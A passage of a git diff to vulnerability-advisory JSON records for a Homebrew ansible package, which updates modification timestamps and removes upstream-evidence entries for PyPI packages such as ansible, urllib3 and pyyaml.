"urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-11324.json b/advisories/BREW-ansible@13-CVE-2019-11324.json index 6684b97529f..3c6efd8d9b0 100644 --- a/advisories/BREW-ansible@13-CVE-2019-11324.json +++ b/advisories/BREW-ansible@13-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-11324", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-14846.json b/advisories/BREW-ansible@13-CVE-2019-14846.json index f5e9841201d..44c764d83cc 100644 --- a/advisories/BREW-ansible@13-CVE-2019-14846.json +++ b/advisories/BREW-ansible@13-CVE-2019-14846.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-14846", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-pm48-cvv2-29q5", "CVE-2019-14846", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-14856.json b/advisories/BREW-ansible@13-CVE-2019-14856.json index ef6541f91a6..5c39f70c520 100644 --- a/advisories/BREW-ansible@13-CVE-2019-14856.json +++ b/advisories/BREW-ansible@13-CVE-2019-14856.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-14856", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-6fq2-x65v-v9h7", "CVE-2019-14856", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-14858.json b/advisories/BREW-ansible@13-CVE-2019-14858.json index d1156f0c283..b90e2472ffe 100644 --- a/advisories/BREW-ansible@13-CVE-2019-14858.json +++ b/advisories/BREW-ansible@13-CVE-2019-14858.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-14858", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-h653-95qw-h2mp", "CVE-2019-14858", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-14864.json b/advisories/BREW-ansible@13-CVE-2019-14864.json index 144d811a6df..1f0b0116463 100644 --- a/advisories/BREW-ansible@13-CVE-2019-14864.json +++ b/advisories/BREW-ansible@13-CVE-2019-14864.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-14864", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3m93-m4q6-mc6v", "CVE-2019-14864", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-14904.json b/advisories/BREW-ansible@13-CVE-2019-14904.json index bcc83e0b8b2..e2d13da1ab4 100644 --- a/advisories/BREW-ansible@13-CVE-2019-14904.json +++ b/advisories/BREW-ansible@13-CVE-2019-14904.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-14904", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gwr8-5j83-483c", "CVE-2019-14904", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-14905.json b/advisories/BREW-ansible@13-CVE-2019-14905.json index 9f682dc497d..c8cc364194a 100644 --- a/advisories/BREW-ansible@13-CVE-2019-14905.json +++ b/advisories/BREW-ansible@13-CVE-2019-14905.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-14905", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-frxj-5j27-f8rf", "CVE-2019-14905", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-18874.json b/advisories/BREW-ansible@13-CVE-2019-18874.json index 5f6cc3a153b..4f5e6fb345a 100644 --- a/advisories/BREW-ansible@13-CVE-2019-18874.json +++ b/advisories/BREW-ansible@13-CVE-2019-18874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-18874", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-qfc5-mcwq-26q8", "CVE-2019-18874", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "psutil", - "subject_version": "7.2.2", - "key": "pkg:pypi/psutil@7.2.2", - "resource": "psutil" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-20477.json b/advisories/BREW-ansible@13-CVE-2019-20477.json index 8491abfb24e..055f5ad8208 100644 --- a/advisories/BREW-ansible@13-CVE-2019-20477.json +++ b/advisories/BREW-ansible@13-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-20477", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-3828.json b/advisories/BREW-ansible@13-CVE-2019-3828.json index 9f0ecf948b5..53aa5b1ec13 100644 --- a/advisories/BREW-ansible@13-CVE-2019-3828.json +++ b/advisories/BREW-ansible@13-CVE-2019-3828.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-3828", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-74vq-h4q8-x6jv", "CVE-2019-3828", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-10684.json b/advisories/BREW-ansible@13-CVE-2020-10684.json index 3d537a21519..b258c777789 100644 --- a/advisories/BREW-ansible@13-CVE-2020-10684.json +++ b/advisories/BREW-ansible@13-CVE-2020-10684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-10684", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-p62g-jhg6-v3rq", "CVE-2020-10684", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-10685.json b/advisories/BREW-ansible@13-CVE-2020-10685.json index 695d00e4594..fb9cdae2340 100644 --- a/advisories/BREW-ansible@13-CVE-2020-10685.json +++ b/advisories/BREW-ansible@13-CVE-2020-10685.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-10685", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-77g3-3j5w-64w4", "CVE-2020-10685", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-10691.json b/advisories/BREW-ansible@13-CVE-2020-10691.json index 5ec80b4d9c4..b14de23b463 100644 --- a/advisories/BREW-ansible@13-CVE-2020-10691.json +++ b/advisories/BREW-ansible@13-CVE-2020-10691.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-10691", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3c67-gc48-983w", "CVE-2020-10691", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-10729.json b/advisories/BREW-ansible@13-CVE-2020-10729.json index 99fd2bd14ca..a2f2fa6a11f 100644 --- a/advisories/BREW-ansible@13-CVE-2020-10729.json +++ b/advisories/BREW-ansible@13-CVE-2020-10729.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-10729", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-r6h7-5pq2-j77h", "CVE-2020-10729", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-10744.json b/advisories/BREW-ansible@13-CVE-2020-10744.json index 712e52e3287..151e8ac89ba 100644 --- a/advisories/BREW-ansible@13-CVE-2020-10744.json +++ b/advisories/BREW-ansible@13-CVE-2020-10744.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-10744", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-vp9j-rghq-8jhh", "CVE-2020-10744", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-14330.json b/advisories/BREW-ansible@13-CVE-2020-14330.json index 04fc80f563a..5b609c95af4 100644 --- a/advisories/BREW-ansible@13-CVE-2020-14330.json +++ b/advisories/BREW-ansible@13-CVE-2020-14330.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-14330", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-785x-qw4v-6872", "CVE-2020-14330", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-14332.json b/advisories/BREW-ansible@13-CVE-2020-14332.json index a216d9e05ba..ed5257c7320 100644 --- a/advisories/BREW-ansible@13-CVE-2020-14332.json +++ b/advisories/BREW-ansible@13-CVE-2020-14332.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-14332", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-j667-c2hm-f2wp", "CVE-2020-14332", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-14343.json b/advisories/BREW-ansible@13-CVE-2020-14343.json index 9bede4ae347..1f9d05c6bbe 100644 --- a/advisories/BREW-ansible@13-CVE-2020-14343.json +++ b/advisories/BREW-ansible@13-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-14343", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-14365.json b/advisories/BREW-ansible@13-CVE-2020-14365.json index cc07bc0c8db..3fac4e5978d 100644 --- a/advisories/BREW-ansible@13-CVE-2020-14365.json +++ b/advisories/BREW-ansible@13-CVE-2020-14365.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-14365", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-m429-fhmv-c6q2", "CVE-2020-14365", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1733.json b/advisories/BREW-ansible@13-CVE-2020-1733.json index 995071dfb29..3805deabcf4 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1733.json +++ b/advisories/BREW-ansible@13-CVE-2020-1733.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1733", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-g4mq-6fp5-qwcf", "CVE-2020-1733", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1734.json b/advisories/BREW-ansible@13-CVE-2020-1734.json index 34ee5c3b732..1b45a7c7ee5 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1734.json +++ b/advisories/BREW-ansible@13-CVE-2020-1734.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1734", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-h39q-95q5-9jfp", "CVE-2020-1734", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1735.json b/advisories/BREW-ansible@13-CVE-2020-1735.json index abc494d2c6f..0e6d9ba7e16 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1735.json +++ b/advisories/BREW-ansible@13-CVE-2020-1735.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1735", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gfr2-qpxh-qj9m", "CVE-2020-1735", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1736.json b/advisories/BREW-ansible@13-CVE-2020-1736.json index f4bad6bb7eb..501d3741a9a 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1736.json +++ b/advisories/BREW-ansible@13-CVE-2020-1736.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1736", "published": "2026-08-13T16:35:22Z", - "modified": "2026-09-03T08:45:29Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-x7jh-595q-wq82", "CVE-2020-1736", @@ -39,13 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1737.json b/advisories/BREW-ansible@13-CVE-2020-1737.json index e04ae04d4ec..22c637fd5dc 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1737.json +++ b/advisories/BREW-ansible@13-CVE-2020-1737.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1737", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-893h-35v4-mxqx", "CVE-2020-1737", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1738.json b/advisories/BREW-ansible@13-CVE-2020-1738.json index b0fede7b46f..9248324fc5b 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1738.json +++ b/advisories/BREW-ansible@13-CVE-2020-1738.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1738", "published": "2026-08-13T16:35:22Z", - "modified": "2026-09-03T08:45:29Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-f85h-23mf-2fwh", "CVE-2020-1738", @@ -39,13 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1739.json b/advisories/BREW-ansible@13-CVE-2020-1739.json index 8fd344018d8..b1eee789861 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1739.json +++ b/advisories/BREW-ansible@13-CVE-2020-1739.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1739", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-923p-fr2c-g5m2", "CVE-2020-1739", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1740.json b/advisories/BREW-ansible@13-CVE-2020-1740.json index e088ac6f43f..acbce3dcdad 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1740.json +++ b/advisories/BREW-ansible@13-CVE-2020-1740.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1740", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-vcg8-98q8-g7mj", "CVE-2020-1740", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1746.json b/advisories/BREW-ansible@13-CVE-2020-1746.json index 31e30b12d7b..d3c077674f4 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1746.json +++ b/advisories/BREW-ansible@13-CVE-2020-1746.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1746", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-j2h6-73x8-22c4", "CVE-2020-1746", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1747.json b/advisories/BREW-ansible@13-CVE-2020-1747.json index 2e23c321429..244246f89d7 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1747.json +++ b/advisories/BREW-ansible@13-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1747", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1753.json b/advisories/BREW-ansible@13-CVE-2020-1753.json index 192baf7a17d..f69a3aeeb83 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1753.json +++ b/advisories/BREW-ansible@13-CVE-2020-1753.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1753", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-86hp-cj9j-33vv", "CVE-2020-1753", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-25635.json b/advisories/BREW-ansible@13-CVE-2020-25635.json index 3c03def4811..edff6b2fbe3 100644 --- a/advisories/BREW-ansible@13-CVE-2020-25635.json +++ b/advisories/BREW-ansible@13-CVE-2020-25635.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-25635", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-f556-49jc-4rvc", "CVE-2020-25635", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-26137.json b/advisories/BREW-ansible@13-CVE-2020-26137.json index 598c02a813f..f18cd0c5d1a 100644 --- a/advisories/BREW-ansible@13-CVE-2020-26137.json +++ b/advisories/BREW-ansible@13-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-26137", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-27783.json b/advisories/BREW-ansible@13-CVE-2020-27783.json index e1c5755f95d..710166e4f3b 100644 --- a/advisories/BREW-ansible@13-CVE-2020-27783.json +++ b/advisories/BREW-ansible@13-CVE-2020-27783.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-27783", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-pgww-xf46-h92r", "CVE-2020-27783", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-28493.json b/advisories/BREW-ansible@13-CVE-2020-28493.json index 59e74b09759..970a0c59d8c 100644 --- a/advisories/BREW-ansible@13-CVE-2020-28493.json +++ b/advisories/BREW-ansible@13-CVE-2020-28493.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-28493", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-g3rq-g295-4j3m", "CVE-2020-28493", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-7212.json b/advisories/BREW-ansible@13-CVE-2020-7212.json index 16c60332e52..44a416eebbf 100644 --- a/advisories/BREW-ansible@13-CVE-2020-7212.json +++ b/advisories/BREW-ansible@13-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": 